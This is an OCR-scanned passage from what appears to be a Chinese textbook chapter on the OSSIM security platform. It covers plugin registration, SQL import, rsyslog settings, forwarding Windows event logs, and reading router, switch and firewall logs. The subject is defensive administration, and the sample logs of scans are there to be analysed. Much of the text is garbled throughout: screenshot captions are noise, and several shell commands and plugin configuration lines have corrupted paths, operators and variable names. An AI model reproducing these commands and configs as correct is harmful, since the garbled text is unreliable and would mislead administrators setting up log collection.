G) 去 除 噪声 ，OSSIM 可 以 排除 某 些 无 关 事件 子 类 型 的 事件 ， 这 些 被 视 为 噪声 ， 说 得 简 
单 点 就 是 在 IDS/IPS 等 安全 设备 上 产生 的 海量 重复 报警 就 是 噪声 。 

(4) 通过 OSSIM 代理 注册 插件 ， 为 了 将 事件 发 送 到 OSSIM 服务 器 ， 需 要 将 插件 激活 ， 
插件 的 路 径 必须 在 代理 配置 文件 中 指定 。 

(5) 通过 OSSIM Server 注册 插件 ， 以 让 服务 器 知道 事件 的 优先 级 和 可 靠 性 价值 的 事件 ， 
就 必须 在 Server 端 也 注册 插件 。 
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(6) 在 Server 端 激活 插件 ， 重 启 OSSIM Server 进程 。 


#/etc/init.d/ossim-server restart 


(7) 在 Agent 代理 端 激活 插件 ， 重 启 OSSIM Agen 进程 。 
f/etc/init.d/ossim-agent restart 


插件 导入 


假设 有 一 段 导 出 的 SQL 文件 ， 其 中 包含 有 可 执行 SQL 语句 。 例 如 将 MySQL 数据 库 备 份 
到 test.sql 文件 里 ， 就 可 以 用 下 面 方法 进行 还 原 : 
#mysql < test.sql 


可 以 在 MySQL 的 提示 符 下 ， 用 SOURCE 命令 来 加 载 SQL 文件 。 但 如 果 压 缩 了 SQL 文 
件 怎么 做 还 原 呢 ?可 以 先 解压 缩 再 加 载 ， 命 令 如 下 : 


#gunzip -c test.sql.gz |mysql 


OSSIM 在 安装 后 期 通过 一 些 SQL 语句 集中 导入 插件 ， 导 入 完毕 ， 放 置 在 
/usr/share/doc/ossim-mysql/contrib./plugins/ 目 录 下 ， 扩 展 名 为 sql.gz。 如 果 发 现 某 些 插件 需 重新 
导入 数据 库 ， 可 以 先 用 gunzip 命令 解压 sql.gz 文件 ， 再 使 用 “ossim-db <file.sql” 方 式 导 入 。 
如 果 是 新 插件 怎么 办 ? 就 复制 一 个 功能 类 似 插 件 ， 然 后 修改 SQL 代码 ， 再 导入 数据 库 。 那 如 
果 只 还 原单 独 的 表 〔 例 如 表 asset) 又 会 怎样 ? 看 看 如 下 操作 : 


#grep 'INSERT INTO 'asset'' test.sql |mysql test 


或 者 文件 是 压缩 的 : 
#gunzip -c test.sql.gz |grep 'INSERT INTO 'asset''|mysql test 


E test 代表 实例 数据 库 名 称 。 一 旦 MySQL 加 载 完 数据 ，gunzip 就 会 自动 退出 。 | 
( 


插件 注册 操作 实例 


Linux 系统 中 last 命令 会 读 取 位 于 /var/log 目录 下 的 wtmp 文件 ， 并 把 该 文件 的 内 容 记录 的 
登录 系统 的 用 户 名 单 全 部 显示 出 来 .状态 更 新 将 被 系统 用 logger 命 令 记录 。 本 实验 以 OSSIM 4.3 
为 平台 。 

(1) 通过 以 下 脚本 来 监控 last 的 状态 


#!/bin/sh 
# create the file if does not exist 
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(2) 日 志 样本 


(3) 在 OSSIM Agent 上 修改 rsyslog.conf 

(o Wi /ete/rsyslog.conf |... 
在 该 文件 未 尾 加 入 以 下 内 容 : 

local2.info /var/log/last logon.log — 0000000000000 
(4) 重启 rsyslog 服务 

© Metc/init.d/rsyslogd restart ——— 0000 

检查 是 否 有 新 的 条 目 写 入 新 日 志文 件 。 
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Jun 10 20:15:09 server-1 LOGON EXAMPLE: > reboot system boot 2.6.31.6 Wed Jun 
IO Th DI 02135) 


(5) 新 建 插件 文件 


#cd /etc/ossim/agent/plugins 
#cp syslog.cfg myexample.cfg 


(6) 修改 新 插件 参数 


77 Building Plugins MyExample 

i; plugin id: 9001 

;; type: detector 

[DEFAULT] 

plugin id-9001 

[config] 

type-detector 

enable-yes 

source-log 

# Enable syslog to log everything to one file. Add it to log rotation also. 
# echo "*.* /var/log/all.log" >> /etc/syslog.conf; killall -HUP syslogd 
dlocation-/var/log/all.log 

location-/var/log/last logon.log 


(7) 在 OSSIM Agent. 上 注册 插件 
编辑 /etc/ossim/agent/config.cfg 文件 。 
在 [plugins] 中 加 入 插件 ， 如 图 7-17 所 示 。 
myexample=/etc/ossim/agent/plugins/myexample.cfg 


最 后 打开 ossim-setup 配置 程序 并 选择 Configure Sensor 一 Select Data Sources， 找 到 
myexample 插件 选中 后 ， 保 存 退 出 。 


AlienVault Setup :: alienvault :: 


图 7-17 新 注册 插件 


(8) 在 OSSIM Server 端 注册 插件 
首先 复制 现 有 的 SQL 脚本 来 建立 新 的 数据 结构 : 


#cd /usr/share/doc/ossim-mysql/contrib/plugins 
#cp syslog.sql myexample.sql 
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um 如 果 是 syslog.sql.gz 需要 先 解压 ， 接 下 来 获取 列表 插件 配置 文件 中 定义 的 规则 。 


具有 相同 的 plugin sid 规则 需要 一 条 SQL 语句 以 及 在 plugin sid 中 定义 服务 器 如 不 同 规 
则 的 ， 则 会 由 last 返回 源 的 IP 或 主机 名 。 此 时 我 们 需要 将 myexample.sql 导入 到 数据 库 ， 使 用 
如 下 命令 : 


如 果 有 报错 提示 ， 请 检查 SQL 语句 是 否 有 错误 。 这 时 可 以 在 Web 界面 下 的 数据 源 中 查看 
这 个 插件 ， 如 图 7-18、 图 7-19 所 示 。 


Data Sources Displaying 1 to 1 of 1 Data Sources 


Quick Search 9001 Data Sourcea ID [v] Search Ce 


Event types (9001, Example) <e Back 1 Data Source Layout savea! Dispiaying 1 10 &or 6 event types 


(cj naut maw vint to P 


cepere - om Pee Rum 
———— CIN 1 
"- ; 5 asm SH m 
- paman mmo cm 
- pee w om 
m : ne" S | 5m 
四 = E m s E 


图 7-19 添加 新 数据 源 
当 看 到 上 面 这 些 信 息 时 说 明 插件 已 成 功 添 加 ， 接 下 来 需要 重启 服务 即 可 生效 。 
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最 后 可 以 到 SIEM 控制 台 下 查看 到 日 志 


Agent 插件 处 理 日 志 举 例 


7.8.1 ”收集 与 处 理 过 程 
本 节 以 Syslog 插件 为 例 说 明日 志 收 集 与 处 理 的 过 程 。 我 们 需要 收集 哪 种 类 型 的 服务 ， 对 
应 着 需要 在 Sensor 的 配置 界面 中 添加 相应 的 插件 ， 如 图 7-20 所 示 。 


图 7-20 更 新 插件 
当选 取 某 个 插件 ， 例 如 syslog 插件 后 ， 单 击 应 用 按钮 ， 稍 后 会 自动 在 
/etc/ossim/ossim_setup.conf 配置 文件 的 [sensor] 域 的 detectors 选项 中 添加 syslog « M 图 7-21 所 
示 。 添 加 的 插件 是 否 成 功 呢 ?我 们 可 以 通过 查询 agent.log 日 志 实 现 ， 有 具体 操作 说 明 如 下 。 


图 7-21 ossim setup 配置 文件 中 的 插件 列表 


比如 ， 我 们 在 “Plugins avaliable” 中 添加 了 iptables 插件 ， 添 加 成 功 后 日 志 会 记录 到 
/var/log/alienvault/agent/agent.log 文件 中 。 


#cat /var/log/alienvault/agent/agent.log |grep iptables 
Feb 27 00:44:23 Virtual python: Alienvault-Agent[INFO]:WATCHDOG 
-plugin(iptables) is enabled 


凡是 修改 ossim setup.conf 配置 文件 后 ， 需 要 运行 ossim-reconfig 命令 使 设置 生效 。 ] 
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OSSIM 中 syslog 插件 收集 的 系统 日 志 ， 如 图 7-22 所 示 。 
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图 7-22 插件 收集 syslog 日 志 
志 以 syslog 形式 发 给 Sensor， 在 探 针 中 含有 ossim-agent， 以 实现 归 


m sun 


一 化 处 理 ， 这 样 日 志 就 会 存在 /varvlog/ 目 录 下 的 某 个 文件 中 ， 例 如 Sensor 的 IP 地 址 为 
192.168.11.105， 我 们 在 Buffalo 设备 的 日 志 收 集 设置 中 的 设置 如 图 7-23 所 示 : 


网 络 /LAN 无 线 配 置 
名 称 ] ea) 日 期 /时 间 | wrP| DAAE 保存 /还 原 | 
neces] 更 新 | 


EER em 
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[ats [ore 
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Fd 7-23 指向 日 志 收集 服务 器 


通过 以 上 设置 可 将 Buffalo 防火 墙 日 志 转 发 到 Sensor (192.168.11.105) 所 在 的 OSSIM 系 


统 中 ， 由 ossim-agent 处 理 防火 墙 收集 的 日 志 ， 


May 
May 
May 
May 
May 
May 
May 
May 
May 


下 一 步 ， 启 用 eon 插件， 如 图 7-20 所 示 。 当 选中 syslog 插件 后 ， 在 /etc/ossim/agent/ 
config.cfg 配置 文件 中 就 会 添加 一 条 语句 ， 接 下 来 输入 以 下 命令 查看 效果 。 


并 存放 在 /var/log/syslog 文件 ， 部 分 内 容 如 下 : 


1449 (br 


connection denied from 192.168.11.223 
Connection denied from 192.168. 


buff : 
buff : 
buff : 


FIREWALL: 
FIREWALL: 
FIREWAL 


buff : FIREWAL 
buff : FIREWALL: 
buff : FIREWALL: 
buff : FIREWALL: 
buff : FIREWALL: 


buff : FIREWALL: TCP connection denied from 192.168.11.223: to 179.47.61.137:445. (bro) 


alienvault:~# cat /etc/ossim/agent/config.cfg|grep syslog.cfg 
apache-syslog-/etc/ossim/agent/plugins/apache-syslog.cfg 
ntsyslog-/etc/ossim/agent/plugins/ntsyslog.cfg 
syslog-/etc/ossim/agent/plugins/syslog.cfg 

alienvault:~# B 


此 时 ossim-agent 会 调用 /etc/ossim/agent/plugins/ 下 面 对 应 的 syslog.cfg 插件 ， 来 分 析 


/var/log/syslog 对 应 的 日 志 。 那 技术 上 如 何 实 现 呢 ? 通 过 
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息 ，syslog 中 正则 表达 式 如 下 : 


regexp="^(?P<logline>(\SYSLOG DATE)\s+(?P<sensor>\S+)\s+(?P<source>\S+) \s+( 
?P<generator>[^\[]*)\[(?P<pid>\d+)\]:(?P<logged event».*))$" 

device={resolv ($sensor)} 

date={normalize date($1)} 

plugin sid=1 

userdatal- (md5sum($1ogline)]) 

userdata2-($1ogline) 

userdata3={ generator} 

userdata4={$logged_event} 

userdata5={$pid} 


最 后 ossim-agent 将 会 把 这 些 字段 内 容 发 给 Server Server 再 继续 处 理 , 下 面 是 关于 Sensor 
上 运行 插件 的 使 用 案例 。 

举例 :收集 Apache 访问 日 志 , 可 以 通过 apache-syslog 插件 解决 这 一 问题 , 在 Apache Server 
上 需要 修改 http.conf 配置 文件 ， 并 加 入 下 面 内 容 。 

CustomLog "|/usr/bin/logger -t httpd -p local6.info" combined 

在 rsyslog.conf 配置 文件 加 入 一 行 : 


local6.* @AlienVault IP 


5 AlienVault IP 推荐 为 OSSIM Server 上 日 志 收集 网 卡 的 卫 地 址 。 | 


当 修改 了 插件 内 容 ， 则 必须 重启 ossim-agent 服务 。 注 意 : TE /usr/share/doc/ossim-mysql 
contrib/plugins/ 下 ， 可 以 找到 和 插件 相关 的 所 有 SQL 文件 。 


7.8.2 常见 Windows 日 志 转 换 syslog 工具 

在 交换 机 、 路 由 器 、Unix/Linux 中 自 带 syslog 而 Windows 系统 则 不 带 ， 因 为 Windows 系 
统 采用 eventlog 服务 记录 程序 和 Windows 发 送 事件 消息 ， 并 不 包含 syslog 日 志 发 送 机 制 。 如 
果 想 收集 Windows 日 志 ， 就 需要 安装 Agent 进行 转发 ， 这 种 软件 包括 以 下 几 种 : 


(1) evtsys 的 特点 是 高 效 、 速 度 快 且 支持 32 位 和 64 位 系统 。 

(2) 在 OSSIM 中 提供 的 是 snare, 支持 32 位 和 64 位 系统 。 通 过 在 客户 端 上 例如 Windows 
系统 安装 snare 后 ， 在 Windows 系统 本 机 浏览 器 打开 http://localhost:6161/， 在 左 侧 Network 
Configuration 中 设 定 Destnation Snare Server Address 和 Destination port 即 可 。 

对 于 syslog 服务 器 的 考虑 一 般 的 小 型 网 络 中 ， 可 以 采用 Winsyslog £X Kiwisyslog (与 之 
对 应 的 免费 工具 是 NTsyslog) 来 建立 syslog 服务 器 ， 其 部 署 拓扑 如 图 7-24 所 示 ， 但 在 大 型 网 
络 环境 中 ， 这 种 部 署 方式 有 些 无 法 胜任 。 本 书 7.17.5 节 还 会 继续 讨论 Snare 和 WMI 的 区 别 。 
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将 syslog 目 标 地 
址 设置 为 


Kiwisyslog 地 址 


日 去 收集 服务 器 


Kiw syslog 9 


图 7-24 基于 Windows 平台 的 小 型 网 络 日 志 收集 方案 


7.8.3 Windows 日 志 审核 
以 evtsys 为 例 ， 它 通过 UDP 3072 端口 ， 将 日 志 发 送 给 远程 的 syslogd 进程 。 那 我 们 需要 收集 
Windows 中 那些 日 志 ? 先 在 windows 设置 一 安全 设置 一 本 地 策略 一 审核 策略 中 配置 以 下 内 容 ， 首 
先 配置 Windows 的 本 地 审核 策略 ， 启 动 本 地 审核 ， 推 荐 使 用 如 表 7-3 所 示 的 审核 策略 。 
表 7-3 策略 定义 

账户 管理 

登录 事件 

对 象 访问 

特权 使 用 


系统 事件 


目录 服务 访问 
账户 登录 事件 成 功 


策略 更 改 


7.84 收集 Windows 平台 日 志 

Windows 有 自己 的 日 志 协 议 ， 称 为 Event Log，Windows 操作 系统 本 身 并 不 支持 将 日 志 发 
送 到 syslog 服务 器 。 为 解决 这 一 问题 可 以 通过 Agent 或 WMI 也 可 以 通过 evtsys 工具 来 实现 。 

在 我 的 博客 中 下 载 evtsys 后 ， 将 其 复制 到 系统 目录 ，XP 下 是 Windows\system32 目录 。 然 
后 在 CMD 下 执行 : 

C:\>evtsys -i -h 192.168.1.101 


参数 说 明 : 


-i 代表 安装 成 Window 服务 
-h 代表 syslog 服务 器 地 址 


398 


第 7 章 OSSIM 日 志 收集 


分 析 


-p 代表 syslog 服务 器 的 接收 端口 ,默认 端口 514 可 省 略 


启动 evtsys 服务 命令 为 “net start evtsys” 
Log 服务 下 面 增加 了 一 
如 图 7-25 所 示 。 


,查看 Windows 的 “服务 ”, 发 现在 原本 Event 


一 个 “Eventlog to Syslog”， 并 且 已 经 启动 。 收 集 到 的 Windows 登录 日 志 


2015.0201034023 ^ ossscwindows 


AY,- Alert - 71422780023" --> RID: 
VirualusNAlInone Host-192-168-11-95 Host192.168-11.95 192.168.11.95 


149" RE “3° RG windows" RC — [.] 
Windows User Logoff.". USER: “leee”. 


EVENT TYPE 


EVENT DETAIL 


AV ert: 1422780023 -> RID 18149 RL 3 RG windows RC Windows User Logot USER eee SRCIP None HOSTNAME (er2000) 192 168 1186 

assec Windows Usar Logoi WinEvtLog LOCATION fwin2000| 192.163.11.35>WinEviLog EVENT [INITI2015 Feb 01 16 40 19 WinEviLog Security AUDIT_SUCCESS(538) Security 
Jeee Nac W2000 šate &Arice Sraque sect saime? acent Alumi suacute LOacure Ange ragjo ssec sAulde Socicleee &Oacute 0 
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VirtualUSMAllinOne. Operating System Authentication Logout 
USERDATA!  USERDATA2 USERDATAS USERDATA4 = USERDATAS  USERDATAG  USERDATA7 USERDATAB  USERDATA9 
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图 7-25 ”收集 的 Windows 登录 日 志 
7.8.5 收集 Cisco 路 由 器 日 志 


Host-192-168-11-95 — 0800:27:47:83:CC 


利用 添加 syslog 插件 相同 的 方法 ， 选 择 cisco-router 插件 并 启用 ， 我 们 可 以 在 日 志 分 析 中 
查看 到 路 由 器 发 来 的 日 志 信息 ， 如 图 7-26 所 示 。 
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D AbWTOWTAT mpe ssor SOURCE ptsrhATON peace DATA SiGNATURE 
pet 1n 2082225 19216811100 15: 09 $32) &RCUO-4-ASWPOKTATTQMPT: Attempted 12 

13 040600 082225 (EE aleman po-192- 1011.219 HowdSo IG tam 19216811100 Consert c ENEL Fon 2 16811219 [o 
Jur NENT OETAL 
cucsimuter] Caco REMO: Parmele 
mand War ng brane 


M 20827 TELE I. 300 55 C353 7 WCWD A RSHPOGTATIEMPT Ateste to connect te RSHELL fom 19216811219 
ssor 


PCTE canore sus CATEGORY 
ea ou yam waning 
IOMSRCUSCINAE  DMSRCDOWAN  IDMSACHOSTNAME  IDMSRCMAC  IDMOSTUSEINAME  IDMDSTDOMAN  IDMDST HOSTNAME  IDMIDST MAC 
amey ewy ranas m æy py somasi. 


p 


图 7-26 采集 到 Cisco 路 由 器 的 一 条 日 志 
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Rsyslog 配置 


针对 syslog 协议 的 不 足 ，rsyslog 日 志 协 议 应 运 而 生 ， 它 提供 了 丰富 的 内 容 过 滤 和 灵活 的 


配置 选项 、 多 线程 的 syslogd 功能 ， 同 一 台 机 器 上 支持 多 子 rsyslog 进程 ， 可 以 监听 不 同 端口 。 
除了 继续 支持 UDP 传输 以 外 ， 还 增添 了 使 用 TCP 进行 传输 的 功能 。 


rsys) 


在 日 志 传 输 安全 方面 , 以 前 通过 Stunnel 解决 了 rsyslog 传输 数据 加 密 的 问题 , 目前 最 新 的 
log〈 版 本 8.4.2) 版 本 自身 就 支持 SSL 加 密 技术 保证 安全 ， 在 近 几 年 发 布 的 所 有 Linux 发 


行 版 本 中 都 换 成 了 rsyslog。 


在 实际 的 使 用 过 程 中 ， 我 们 可 以 通过 查看 配置 文件 和 相应 的 日 志文 件 来 使 用 Rsyslog。 在 


数据 库 支持 方面 ， 它 广泛 支持 各 种 数据 库 ， 尤 其 对 MySQL 和 Postgres 数据 库 的 支持 比较 好 。 


7.9.1 Rsyslog 配置 详解 


下 面 简单 解释 /etc/rsyslog.conf 配置 文件 的 主要 内 容 : 


#### MODULES HH # 定 义 日 志 的 模块 

$ModLoad imuxsock dimuxsock 为 模块 名 ， 支 持 本 地 系统 日 志 的 模块 
$ModLoad imklog #imklog 为 模块 名 ， 支 持 内 核 日 志 的 模块 

*$ModLoad immark #immark 为 模块 名 ， 支 持 日 志 标记 

#$ModLoad imudp #imupd 为 模块 名 ， 支 持 UDP 协议 

#$UDPServerRun 514 # 人 允许 514 端 口 接收 使 用 UDP 和 TCP 协议 转发 过 来 的 日 志 
#$ModLoad imtcp #imtcp 为 模块 名 ， 支 持 TCP 协议 
#$InputTCPServerRun 514 

#### GLOBAL DIRECTIVES dH 定义 全 局 日 志 格式 的 指令 


$ActionFileDefaultTemplate RSYSLOG TraditionalFileFormat # 定 义 日 志 格式 默认 模板 
$IncludeConfig /etc/rsyslog.d/*.conf  # 载 入 rsyslog.d 文 件 中 所 有 以 conf 结尾 的 文件 
dHHHE RULES. HHHE 

*.info;mail.none;authpriv.none;cron.none /var/log/messages 


3HHHHHIOGE PEG EL 2E] info 级 别 以 及 大 于 info 级 别 的 信息 到 /var/1og/messages, 但 是 mail 


邮件 信息 ，authpriv 验证 方面 的 信息 和 cron 时 间 # 任 务 相 关 的 信息 除外 
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authpriv.* /var/log/secure 

HHHHauthpriv 验证 相关 的 所 有 信息 存放 在 /var/1og/secure 
mail.* -/var/log/maillog 
##### 邮 件 的 所 有 信息 存放 在 /var/1og/maillog; 这 里 有 一 个 “-” 符 号 表示 是 使 用 异步 的 方式 记录 
cron.* /var/log/cron 

#### 计 划 任 务 有 关 的 信息 存放 在 /var/10g/cron 

*.emerg * CERBEB RIP) 

### 记 录 所 有 的 之 emerg 级 别 信息 ， 发 送 给 每 个 登录 到 系统 的 用 户 
uucp,news.crit /var/log/spooler 

dHHHHU3* uucp, news .crit 等 存放 在 /var/10g/spooler 
local7.* /var/log/boot.log 

#### 本 地 服务 器 的 启动 的 所 有 日 志 存 放 在 /var/10og/boot.1og 中 


四 Ty ZZ 


从 上 到 下 ， 级 别 从 低 到 高 ， 记 录 的 信息 越 来 越 少 ， 如 果 设 置 的 日 志 类 型 为 err， 则 日 志 不 
会 记录 比 err 级 别 低 的 日 志 ， 只 会 记录 比 err 更 高 级 别 的 日 志 ， 也 包括 err 本 身 的 日 志 。 


7.9.2 Rsyslog 配置 参数 含义 
在 OSSIM 系统 中 rsyslog 有 4 个 参数 需要 大 家 了 解 : 


€ -m0: 代表 禁用 “标记 ”的 消息 ， 只 有 在 -c 参数 (代表 兼容 模式 3 时 使 用 。 

€ r: 代表 启用 远程 机 器 的 logging 功能 ， 只 有 在 -c 参数 (代表 兼容 模式 ) <3 时 使 用 。 

€ -x: 代表 接收 信息 时 禁用 DNS 查询 。 

€ -c: 代表 兼容 模式 ，-c3， 代 表 运 行 在 v3 模式 ， 这 样 开启 中 心服 务 器 功能 必须 在 
rsyslog.conf 中 配置 ， 而 不 能 在 命令 行 设置 。 关 于 兼容 模式 详情 通过 “man rsyslogd” 
命令 了 解 。 


系统 默认 /etc/default/rsyslog 参数 为 RSYSLOGD_OPTIONS="-c3 -x"。 

-x 表示 禁止 日 志 服务 器 解析 远程 主机 的 FQDN (fully qualified domain name). RUNY F, 
当 有 其 他 机 器 向 自己 发 送 日 志 消息 时 ， 中 央 日 志 服务 器 将 尝试 解析 该 机 器 的 FQDN。 如 果 
Syslog 守护 进程 无 法 解析 出 地 址 ， 它 会 继续 尝试 ， 当 日 志 发 送 量 很 大 时 ,这 种 尝试 非常 浪费 时 
间 ， 应 该 禁止 。 


7.9.3 选择 合适 的 日 志 级 别 

日 志 记录 器 是 日 志 收集 的 核心 部 分 ， 我 们 在 客户 端 收集 日 志 信息 包含 服务 类 型 ， 日 志 
别 以 及 日 志 接收 服务 器 的 IP 地址 。 除 了 IP 是 固定 以 外 ， 服 务 类 型 和 日 志 级 别 都 有 多 个 选项 ， 
造成 在 使 用 中 容易 混乱 ， 通 常 我 们 在 rsyslog.conf 添加 一 条 信息 ， 用 来 将 日 志 转 发 到 日 志 收 集 
服务 器 ， 日志 格式 如 下 : 
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在 其 中 服务 类 型 和 日 志 级 别 又 分 为 若干 种 ， 如 图 7-27 所 示 。 


主要 服务 类 型 日 志 级 别 
whemüprir 0000 0 0 0 [77 
认证 站 关 的 机 制 信息 info 
例 行 性 命令 相关 的 信息 | notice 
| 
与 内 核 要 关 的 信息 | warn 
| 


图 7-27 日 志 级 别 的 选择 


举例 : 


服务 类 型 “日志 级 别 日 志 接收 服务 器 IP 地 址 
mail. *  @192.168.100.1 


这 表示 表示 将 mail 服务 的 所 有 级 别 日 志 发 送 至 服务 器 192.168.0.1， 当 然 有 些 用 户 会 使 用 如 


下 配置 条 目 : 


服务 类 型 日 志 级 别 日 志 接收 服务 器 IP 地 址 
*. *  8192.168.100.1 


(10. 网 络 设备 日 志 分 析 与 举例 


下 面 分 析 路 由 器 日 志 并 给 出 应 用 实例 。 网 络 边界 安全 中 最 容易 被 忽略 , 但 也 是 最 重要 的 工 
作 是 网 络 日 志 收集 与 分 析 。 通过 对 各 种 日 志文 件 进行 严密 监控 和 分 析 , 来 试图 识别 出 入 侵 和 入 
侵 企 图 , 这 个 过 程 还 涉及 在 这 些 日 志文 件 当中 对 事件 进行 关联 。 需 要 进行 检查 的 网 络 日 志文 件 
有 多 种 类 型 ， 还 包括 设备 〈 包 括 网 络 防火 墙 、 路 由 器 ) 日 志 。 

企业 网 络 设备 日 志 分 析 分 为 三 类 : 

€ 路 由 器 日 志 分 析 

e 防火 墙 日 志 分 析 

© 交换 机 日 志 分 析 
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(1) 网 络 日 志 共 同 特点 
网 络 设备 都 可 以 记录 日 志 ， 它 们 对 日 志 记录 了 的 几 个 核心 部 分 〈 例 如 记录 网 络 信息 等 ) 
分 别 是 : 

e nE 包括 日 期 以 秒 为 单位 的 时 间 , 表示 事件 发 生 的 时 间或 事件 记录 到 日 志 中 的 时 
间 ， 有 时 也 标记 千 分 之 几 秒 。 

€ IP: 如 源 地 址 、 目 标 地 址 和 IP HA (TCP, UDP, ICMP 4). 

@ Line 状态 和 Line 协议 状态 : 网 络 设备 经 常会 出 现 掉 电 重启 的 情况 ， 会 通过 接口 状态 
表现 出 来 ， 其 中 up 表示 链 路 工作 正常 或 线路 协议 匹配 成 功 ，down 表示 未 连接 到 LAN 
或 协议 匹配 失败 。 


(2) 综合 故障 诊断 网 络 日 志 实战 
网 络 设备 日 志 在 进 行 综合 故障 诊断 时 可 以 提供 帮助 ， 当 涉及 连接 故障 诊断 时 更 是 如 此 。 例 
如 ,假设 某 个 用 户 抱怨 应 用 程序 不 能 从 外 部 服务 器 下 载 数据 。 通过 获取 此 用 户 机 器 的 TP 地 址 ， 
然后 找 出 它 是 在 什么 时 候 使 用 这 个 应 用 程序 的 , 就 可 以 快速 搜索 防火 墙 的 日 志 , 寻找 为 建立 所 
需 连 接 而 进行 的 (被 拒绝 的 ) 尝试 。 如果 防 火 墙 对 所 有 允许 的 连接 也 进行 了 日 志 记 录 ， 而 能 够 
从 日 志 中 找到 到 达 此 远程 站 点 的 有 效 连接 。 那么 , 从 这 个 事实 中 可 以 看 出 问题 最 有 可 能 与 远程 
服务 器 或 应 用 程序 有 关 ， 而 不 是 同 自己 的 边界 防御 配置 有 关 。 


7.10.1 路 由 器 日 志 分 析 

路 由 器 日 志 倾 向 于 只 包含 最 基本 的 网 络 信息 ， 路 由 器 日 志 在 判 断 ARP 病毒 攻击 和 识别 特定 类 
型 的 活动 (如 未 经 授权 的 连接 尝试 和 端口 扫描 ) 时 极为 有 用 。 下 面 我 们 一 起 分 析 一 段 路 由 器 日 志 。 

Mar 18 06:15:30 [192.168.0.10] 356118.$SEC-6-IPACCESS-LOGP:list 102 tcp 
172.14.16.20(1846) -»10.20.10.18(80),1 packet 

Mar 18 06:15:30 [192.168.0.10] 356118.$SEC-6-IPACCESS-LOGP:list 102 tcp 
172.14.16.20(1846) -»10.20.10.19(80),1 packet 

Mar 18 06:15:31 [192.168.0.10] 356118.$SEC-6-IPACCESS-LOGP:list 102 tcp 
172.14.16.20(1846) -»10.20.10.20(80),1 packet 


第 一 条 日 志 主 要 告诉 我 们 有 人 连接 到 HTTP 主机 ， 且 该 路 由 器 阻塞 了 这 条 连接 。 然 而 往 


下 却 又 有 上 千 条 类 似 这 样 的 条 目 ， 每 一 个 条 目 都 涉及 不 同 目的 主机 上 的 TCP 端口 80， 这 意味 
着 有 人 正在 对 网 络 进行 扫描 ， 其 目的 就 是 要 寻找 Web 服务 器 。 


7.10.2 ”交换 机 日 志 分 析 

为 了 诊断 网 络 故 障 , 有 必要 启用 路 由 器 、 交换 机 的 日 志 功 能 , 将 他 们 集中 保存 在 日 志 服务 
器 。 下 面 举 了 几 条 思科 、 华 为 、 中 兴 交 换 机 上 产生 的 典型 日 志 (日 志 种 类 远 不 止 下 面 介绍 的 这 
几 个 )。 
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举例 1: Cisco 3750 下 联 两 台 2960 分 别 连 接 两 台 做 了 负载 均衡 的 服务 器 ， 在 Cisco 3750 
上 的 日 志 总 是 重复 两 条 ， 其 他 日 志 无 法 查看 。 
日 志 内 容 : 


分 析 : 交换 机 交换 数据 包 是 通过 MAC 地 址 转发 的 ， 交 换 机 会 有 一 个 MAC 地 址 表 存 储 每 
个 端口 对 应 的 目的 MAC 地 址 ， 也 就 是 收 到 数据 包 后 查看 目的 MAC 地 址 ， 然 后 转发 到 相应 的 
端口 ， 如 果 丙 个 端口 同时 存在 相同 的 MAC 地 址 ， 就 会 出 现 拌 动 ， 也 就 是 上 面 写 的 : 
”VIAN20 中 的 主机 0201.0a80. 6616% 61/0/91 61/0/1080 


解决 方案 : 清空 MAC 地 址 表 和 ARP 地 址 表 ( 待 ARP 表 项 超时 ，MAC 地 址 表 就 正常 了 )。 


举例 2: 


这 条 日 志 记录 表示 一 个 用 户 在 Nov 22 22:30:08 2010 ， 从 IP 地 址 为 192.168.0.10 的 设备 登 
录 到 名 为 Quidway_S6500BJ 的 交换 机 上 ， 执 行 了 stp 命令 。 


举例 3: 


这 条 日 志 表 示 在 Nov 23 20:30:18 2010， 交 换 机 Quidway S6500 BJ 属于 VLANTO 的 千 兆 
端口 GigabitEthernetl/0/1 下 连 客户 机 ， 发 生 了 IP 地 址 冲突 ， 地 址 为 0029_d4d6_7e08 和 
0029 d4d4 74a3。 


举例 4: 
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反复 出 现 这 种 日 志 ， 典 型 症状 是 CPU 利用 率 非常 高 ， 转 发 几乎 停滞 ， 这 是 因为 交换 机 出 
现 环 路 ， 导 致 广播 风暴 。 
举例 5: 


An alarm 18710 level 6 occurred at 10:21:10 05/12/2010 UTC sent by MEC 1 $IP$ 
Interface up on vlan2 


这 是 一 个 由 VLAN2 导致 三 层 端口 出 现 故 障 之 后 ， 在 中 兴 交 换 机 上 产生 的 告警 日 志 。 
举例 6: 


An alarm 19716 level 6 occurred at 10:16:50 09/01/2010 UTC sent by NPC 2 $ARP$ 
The source IP address 208.80.160.120 conflicts with our IP address of vlan2 


这 是 中 兴 交 换 机 上 一 条 VLAN2 中 IP 地 址 冲突 产生 的 告警 。 


举例 7: 


08:59:20 05/12/2010 UTC alarm 22780 occurred $MAC$ [Module 70] [MAC Table] [MAC 
00D0.D0C0.94B0 VLAN 2] From Port xgei 4/2 To Port gei 6/19 sent by NPC 5ge 

08:59:21 05/12/2010 UTC alarm 22780 occurred $MAC$ [Module 70] [MAC Table] [MAC 
00D0.D0C0.94B0 VLAN 2] From Port xgei 4/2 To Port gei 6/19 sent by MEC li 


这 是 一 个 MAC 漂移 的 告警 信息 。 


7.10.3 防火墙 日 志 分 析 

防火 墙 是 位 于 内 外 网 之 间 的 咽喉 要 道 , 所 有 流量 都 要 通过 防火 墙 , 这 样 防火 墙 对 每 个 包 都 
要 进行 检查 。 下 面 分 别 以 Cisco 的 PIX 防火 墙 和 ASA 为 例 ， 分 析 防 火 墙 日 志 。 

1. PIX 日 志 

PIX 日 志 以 一 个 百 分 号 % 开 始 ,其 后 加 一 个 格式 化 字符 串 ， 一 条 完整 的 日 志 信息 可 以 表示 为 : 


$PIX Level Message number:Message text 
€ PIX: 设备 标识 符 ， 说 明日 志 信息 是 PIX 系列 防火 墙 。 
€ Level: 上 日志 级 别 ， 说 明 该 日志 的 严重 程度 ，PIX 日 志 也 是 分 为 8 个 级 别 ， 分 别 从 0 
~7 依 次 递减 。 
接 下 来 我 们 来 看 几 个 日 志 的 例子 : 
COD. 邮件 防护 日 志 


$PIX 2 108002:SMTP replaced string : out source address in inside address 
data:string 


这 条 日 志 表 示 : 当 用 户 在 防火 墙 上 使 用 了 fixup protocol smtp 时 , 就 打开 了 邮件 防护 功能 ， 
这 样 一 来 防火 墙 可 以 限制 到 达 邮 件 服务 器 的 SMTP 消息 、 隐 藏 SMTP 标题 等 ， 如 果 某 个 邮件 
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地 址 部 分 包含 了 非法 字符 ，PIX 就 会 将 非法 字符 用 空格 蔡 代 。 


(2) 登录 验证 失败 日 志 
